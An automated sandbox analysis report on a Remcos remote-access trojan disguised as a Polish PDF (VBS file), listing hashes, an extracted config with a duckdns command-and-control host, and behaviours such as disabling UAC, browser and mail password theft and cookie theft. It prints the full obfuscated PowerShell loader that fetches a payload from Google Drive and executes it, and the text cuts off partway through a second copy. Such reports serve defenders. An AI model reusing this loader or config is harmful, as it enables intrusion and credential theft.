remcos | a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WNIOSEKBUDETOWY25-11-2024pdf.vbs
Size

16KB
MD5

7629b8a9f44c0d82a77edd71ff758028
SHA1

c7e7708565e250860139338d8a0dd79ba05a0b54
SHA256

a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12
SHA512

2ede58762d50013647f32a1b55c9979f0f99820c5e0fc2dbc94403d80f9a222fb07f319857e4fc2a25407b4c33d118250e4ff48475d83c49333c9c23a591d15c
SSDEEP

384:9Wl6/kDhGteC20UFY0Z0o6m1PdFu+mTD5Za:3/kMteC2VFeo64PruJK

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

hg575438h-0.duckdns.org:23458

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WNVZ5S
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/2364-105-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3604-89-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/5004-88-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/2364-105-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/3604-89-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	process
3	5076	WScript.exe
9	2700	powershell.exe
15	2700	powershell.exe
41	2976	msiexec.exe
43	2976	msiexec.exe
45	2976	msiexec.exe
48	2976	msiexec.exe
49	2976	msiexec.exe
51	2976	msiexec.exe
53	2976	msiexec.exe
54	2976	msiexec.exe
55	2976	msiexec.exe
56	2976	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
credential_access stealer

Steal Web Session Cookie
T1539

Modify Authentication Process
T1556

Processes:

Chrome.exeChrome.exemsedge.exemsedge.exemsedge.exemsedge.exeChrome.exeChrome.exemsedge.exe

pid process

640 Chrome.exe
3348 Chrome.exe
4416 msedge.exe
1484 msedge.exe
3536 msedge.exe
1444 msedge.exe
5056 Chrome.exe
2720 Chrome.exe
1596 msedge.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe

pid	process
640	Chrome.exe
3348	Chrome.exe
4416	msedge.exe
1484	msedge.exe
3536	msedge.exe
1444	msedge.exe
5056	Chrome.exe
2720	Chrome.exe
1596	msedge.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2700 powershell.exe
3984 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
9 drive.google.com
41 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid process

2976 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid process

3984 powershell.exe
2976 msiexec.exe

flow	ioc
6	drive.google.com
9	drive.google.com
41	drive.google.com

pid	process
2976	msiexec.exe

pid	process
3984	powershell.exe
2976	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 2976 set thread context of 3604	2976	msiexec.exe	msiexec.exe
PID 2976 set thread context of 2364	2976	msiexec.exe	msiexec.exe
PID 2976 set thread context of 5004	2976	msiexec.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exemsiexec.execmd.exereg.exemsiexec.exemsiexec.exemsiexec.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3184 reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
3184	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	process
2700	powershell.exe
2700	powershell.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
5004	msiexec.exe
5004	msiexec.exe
3604	msiexec.exe
3604	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
640	Chrome.exe
640	Chrome.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
3604	msiexec.exe
3604	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exemsiexec.exe

pid process

3984 powershell.exe
2976 msiexec.exe
2976 msiexec.exe
2976 msiexec.exe
2976 msiexec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

4416 msedge.exe
4416 msedge.exe
4416 msedge.exe
4416 msedge.exe

pid	process
3984	powershell.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe
2976	msiexec.exe

pid	process
4416	msedge.exe
4416	msedge.exe
4416	msedge.exe
4416	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	5004	msiexec.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe
Token: SeShutdownPrivilege	640	Chrome.exe
Token: SeCreatePagefilePrivilege	640	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid process

640 Chrome.exe
4416 msedge.exe
4416 msedge.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid process

2976 msiexec.exe

pid	process
640	Chrome.exe
4416	msedge.exe
4416	msedge.exe

pid	process
2976	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	process	target process
PID 5076 wrote to memory of 2700	5076	WScript.exe	powershell.exe
PID 5076 wrote to memory of 2700	5076	WScript.exe	powershell.exe
PID 3984 wrote to memory of 2976	3984	powershell.exe	msiexec.exe
PID 3984 wrote to memory of 2976	3984	powershell.exe	msiexec.exe
PID 3984 wrote to memory of 2976	3984	powershell.exe	msiexec.exe
PID 3984 wrote to memory of 2976	3984	powershell.exe	msiexec.exe
PID 2976 wrote to memory of 3340	2976	msiexec.exe	cmd.exe
PID 2976 wrote to memory of 3340	2976	msiexec.exe	cmd.exe
PID 2976 wrote to memory of 3340	2976	msiexec.exe	cmd.exe
PID 3340 wrote to memory of 3184	3340	cmd.exe	reg.exe
PID 3340 wrote to memory of 3184	3340	cmd.exe	reg.exe
PID 3340 wrote to memory of 3184	3340	cmd.exe	reg.exe
PID 2976 wrote to memory of 640	2976	msiexec.exe	Chrome.exe
PID 2976 wrote to memory of 640	2976	msiexec.exe	Chrome.exe
PID 640 wrote to memory of 2392	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 2392	640	Chrome.exe	Chrome.exe
PID 2976 wrote to memory of 3604	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3604	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3604	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3604	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3352	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3352	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 3352	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 2364	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 2364	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 2364	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 2364	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 5004	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 5004	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 5004	2976	msiexec.exe	msiexec.exe
PID 2976 wrote to memory of 5004	2976	msiexec.exe	msiexec.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 5092	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 4444	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 4444	640	Chrome.exe	Chrome.exe
PID 640 wrote to memory of 1932	640	Chrome.exe	Chrome.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WNIOSEKBUDETOWY25-11-2024pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe MortSTestyOffesforeT Di eReknM Syl.Mis $Knips ajePStamlRekoeSeceESub NTerreRy kNAdkvS');dalmatiners ($billetsalg);dalmatiners (Preenforcing 'Rntg$ElekARecorP rcbLydtiPenstSerarBarba Tykg dbeAnteaMidtfRemedLinoeTegnlHalui ubn IndgCollere,an D.v.bemeHAflyeHai aMisudStjmeEnrorpen sBrun[ T p$AlcyDUmaau JetnDagigValshR,byiCicelAd llNank]Rect=S.ar$ alvNDuloo Vo.nCynouBra t SveiSen lSno iOmfatAgteiAtike atis');$Lastvrk=Preenforcing ' U.s$ FriAVe,trCircbOctaiMor,t ntrUnmoaSporgSubde ngaaDislf La dSfyreWatclNonti,estnVe eg ForeMontn Reg.FighD BlaoFentwS,aanRuc lRe ooS joaStoldtrd FR naiEsmelWoefe Dah(Post$Gen SSammlM nsuRadikspilkFje,eFlertMont,Hypn$PostONonevSeaseGaa reftesTegnkS rguHomodR.cisTracp C.frM dtoPro dE,eruPr,tkEvertBoroi BrnoEscanlowle farr icenLigeeSpils,ord)';$Overskudsproduktionernes=$Ledelinie250;dalmatiners (Preenforcing ',ndd$ Hemg Or.L armOBortBSonja DisLGern: BriHkrukymuckdA,hmr IleUPaafr Attu ors ,or=Se.e(,tiktFiliekrlissol,TLege-AnidpDepaAKernTPreshAlde Nonc$FormOGardv f jE T nrConvSQuadkPh.luskeeDSkinsIntepBobbr akOPoseDS raU.etoKSymmtAn iIAft O Slun agdeMotorPolyNRenheT.rpS g i)');while (!$Hydrurus) {dalmatiners (Preenforcing ' Spi$ChaigChimlSdsuoSma.bB,eaaHa mlNonr:afveC ,rshZardaAvigrParattilgrHulki Bo ngradgOye,e Refnbed.= Pap$Ch ePDroso BartDrttiRecacOverhCyclo mimmFootaAabnnArboiAfgaa') ;dalmatiners $Lastvrk;dalmatiners (Preenforcing 'R crSTusit Un a ResRB ldTSepo-JydsSVan.L MeaeOndaEDiespDeic Sp n4');dalmatiners (Preenforcing ' Nyt$BioggDespl S eO GarbSigta rtilPali:Ven hKonfyR gndIna,rBeriU la.r Lu UVagaSAlfa=.uto(TunftRespeEthosUkloTAlgi-HimmPFejlABeauTRefehOut. Chik$Ukldo HvlvJor E S bRSubesPoolkUnd.u ,ledAll s UnspLapiR isdODundDNegeUK,rkK MartFrasI H cOinteNGh seKaraR IniNJernEDextsInge)') ;dalmatiners (Preenforcing ' Inf$Fo,sGPedilLejeoLaboB jenaNysgL Lan:IncuTS bfrL.ndEMyndEO erII.dhNg ndG oad=dors$J veg aadlAthrOLieuBAag aCalllmiss:Bardy esknBiflGRepeLUnp.ESpleDY tpyBespg CalT dueiRiemgDds eHjkiSDrab+Bl k+Si.e% Sol$Unsuc O,tOBllen E cSUngkt SteRRubbu CamcEremTSko.iLovfoLselnSedaA Scol A blTi,ey rov.Exarce,feoFrinu SkonGarrT') ;$Slukket=$Constructionally[$Treeing]}$Polaristrobometer=307322;$databgernterpretative=30954;dalmatiners (Preenforcing ' ele$Evi,GA,icL TomoTr mbPoleADrhalGire:Flagd edeRStraAD.gaGHoveePreueulovrBygnn auE run V l=Ubet AlkoGDallEBru tSt d-OutrC nseo H,nNN,nrTOmseECrofnShelT M.d St e$Predooph,VAs iENon RSkilSTovekIatrU A eDCiriS Al.p I oRSilvodegaDDemouautokDybsTImmuI LacO.igan LonEUdf.rBas.n TenetrniS');dalmatiners (Preenforcing 'pols$ExtegrecolAd loYde.b.steaBai,lPins: AmoE Gral Fl a Sorb Dego E erMi,naHumbtBicieSupesSyge S,e=Udb. Kali[BestSoneryPressFremtLar.eEgetmEmba.A,dwCRehaoMo rnAffav KleeT llrKrfttGr m]Stot: ,is:BlafFCla rR.daoTaksmTatoBT pka oofsfld eEarn6 .ud4Mis,S lytB,rtr ElriReapnUnstg.ngv(Orga$ T.dD Zy rPostasab.gTalleArche lygrW,ennwo,geNatb)');dalmatiners (Preenforcing ' Gra$Pa tGChadLUdenOPlumbBenaa Vi.l Pra: RepJSkanIBebum A tjBalaASupeMN tusLedn Kaff=Natt In r[ arrssqueYmid s FagTbl kEForlmAcre.S,amTBri eRachxcic TCal . S,mESpidNNonfCWan Or gnDSvmmiBrann St g.ors]Typo:Cali: s iaFjersTr ic,jleISub,ICons.NetsGLageeMa cT Tr SFilmTMichrBopyIBo unFri.gAuto(Hj,m$InvoEEn.elBu taIoniBDveloPantrCoota PretAflaeTodksHist)');dalmatiners (Preenforcing '.tal$B ocGRimsLInfaORealBDainAUdstlgamm:SpinpBidseThorlPanmeLugtc EenASpydnUnfaUL ndSResn= .re$PrerjGib i FejmUltijEpima sadMOverSLanc.CavasSu fuSillbbardsOleaT orsROpb iD asnA.begA om(Sejs$ Ep,PHoveO raglRib ADdker,ednI Pl.SDoodTNonbrPuseOCatcbspe OUnc MDisse.olstOutqE jerR alg,Kont$ ,usDP,tta G eTUndeaElg BetvrgInduERediR miln UndtSa sE orkROph P unkRRevieP.ssTPr mABri.TViroiM llVDagse ut)');dalmatiners $Pelecanus;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe 